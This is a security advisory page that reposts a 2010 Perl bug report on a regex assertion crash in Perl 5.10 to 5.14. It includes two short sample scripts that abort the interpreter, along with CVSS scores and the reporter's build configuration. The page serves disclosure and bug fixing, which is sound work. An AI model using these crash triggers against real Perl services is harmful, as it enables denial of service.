PERL 5.10.0, 5.12.0, 5.14.0 Denial of Service

2014.02.10
Credit: Nobody
Risk: Low
Local: Yes
Remote: No
CWE: CWE-20


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

This is a bug report for perl from mons@cpan.org, generated with the help of perlbug 1.39 running under perl 5.12.0. ----------------------------------------------------------------- [Please describe your issue here] ##### sample.pl ##### use utf8; my @make; while (<DATA>) { chomp; push @make, ''; s{\\\s*$}{}; $make[-1] .= $_; } for (@make) { m{^([^=]+?)\s*=\s*(.+)$}o; } __DATA__ A= AAAA=\ ### end sample.pl ### or ##### sample.pl ##### my @x = ("A=B","AAAA=/"); utf8::upgrade $_ for @x; $x[1] =~ s{/\s*$}{}; for (@x) { m{^([^=]+?)\s*=.+$}; } ### end sample.pl ### Assertion failed: (rx->sublen >= (s - rx->subbeg) + i), function Perl_reg_numbered_buff_fetch, file regcomp.c, line 5199. Abort trap: 6 (core dumped) Repeatable under: - v5.10.1 (*) built for i686-linux-thread-multi - v5.10.0 built for amd64-freebsd - v5.10.1 (*) built for amd64-freebsd - v5.12.0 built for amd64-freebsd - v5.13.2 built for amd64-freebsd [Please do not change anything below this line] ----------------------------------------------------------------- --- Flags: category=core severity=medium --- Site configuration information for perl 5.12.0: Configured by mons at Fri May 7 14:44:18 MSD 2010. Summary of my perl5 (revision 5 version 12 subversion 0) configuration: Platform: osname=freebsd, osvers=7.1-release-p2, archname=amd64-freebsd uname='freebsd veda.park.rambler.ru 7.1-release-p2 freebsd 7.1-release-p2 #0: thu feb 12 22:34:21 msk 2009 root@veda.park.rambler.ru:usrobjusrsrcsysdevel amd64 ' config_args='-des -Dprefix=/home/mons -Duse64bitint -DDEBUG_LEAKING_SCALARS -DDEBUGGING -Dinc_version_list=none -Dccflags=-O2 -march=athlon64 -fomit-frame-pointer -pipe -ggdb -g3 -Doptimize=-O2 -g3' hint=recommended, useposix=true, d_sigaction=define useithreads=undef, usemultiplicity=undef useperlio=define, d_sfio=undef, uselargefiles=define, usesocks=undef use64bitint=define, use64bitall=define, uselongdouble=undef usemymalloc=n, bincompat5005=undef Compiler: cc='cc', ccflags ='-O2 -march=athlon64 -fomit-frame-pointer -pipe -ggdb -g3 -DHAS_FPSETMASK -DHAS_FLOATINGPOINT_H -DDEBUGGING -fno-strict-aliasing -fstack-protector -I/usr/local/include', optimize='-O2 -g3', cppflags='-O2 -march=athlon64 -fomit-frame-pointer -pipe -ggdb -g3 -DHAS_FPSETMASK -DHAS_FLOATINGPOINT_H -DDEBUGGING -fno-strict-aliasing -fstack-protector -I/usr/local/include' ccversion='', gccversion='4.2.1 20070719 [FreeBSD]', gccosandvers='' intsize=4, longsize=8, ptrsize=8, doublesize=8, byteorder=12345678 d_longlong=define, longlongsize=8, d_longdbl=define, longdblsize=16 ivtype='long', ivsize=8, nvtype='double', nvsize=8, Off_t='off_t', lseeksize=8 alignbytes=8, prototype=define Linker and Libraries: ld='cc', ldflags ='-Wl,-E -fstack-protector -L/usr/local/lib' libpth=/usr/lib /usr/local/lib libs=-lgdbm -lm -lcrypt -lutil -lc perllibs=-lm -lcrypt -lutil -lc libc=, so=so, useshrplib=false, libperl=libperl.a gnulibc_version='' Dynamic Linking: dlsrc=dl_dlopen.xs, dlext=so, d_dlsymun=undef, ccdlflags=' ' cccdlflags='-DPIC -fPIC', lddlflags='-shared -L/usr/local/lib -fstack-protector' Locally applied patches: --- @INC for perl 5.12.0: /home/mons/perl/perl-ex /home/mons/lib/perl5/site_perl/5.12.0/amd64-freebsd /home/mons/lib/perl5/site_perl/5.12.0 /home/mons/lib/perl5/5.12.0/amd64-freebsd /home/mons/lib/perl5/5.12.0 . --- Environment for perl 5.12.0: HOME=/home/mons LANG=en_US.UTF-8 LANGUAGE (unset) LD_LIBRARY_PATH (unset) LOGDIR (unset) PATH=/home/mons/home-bin:/home/mons/bin:/home/mons/flex/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/games:/usr/local/sbin:/usr/local/bin:/home/mons/bin PERL5LIB=/home/mons/perl/perl-ex PERL_BADLANG (unset) SHELL=/usr/local/bin/bash

References:

https://rt.perl.org/Public/Bug/Display.html?id=76538
https://listi.jpberlin.de/pipermail/postfixbuch-users/2011-February/055885.html
https://bugzilla.redhat.com/show_bug.cgi?id=694166
http://lists.opensuse.org/opensuse-updates/2011-05/msg00025.html
http://lists.opensuse.org/opensuse-security-announce/2011-05/msg00005.html
http://forums.ocsinventory-ng.org/viewtopic.php?id=7215
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=628836


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top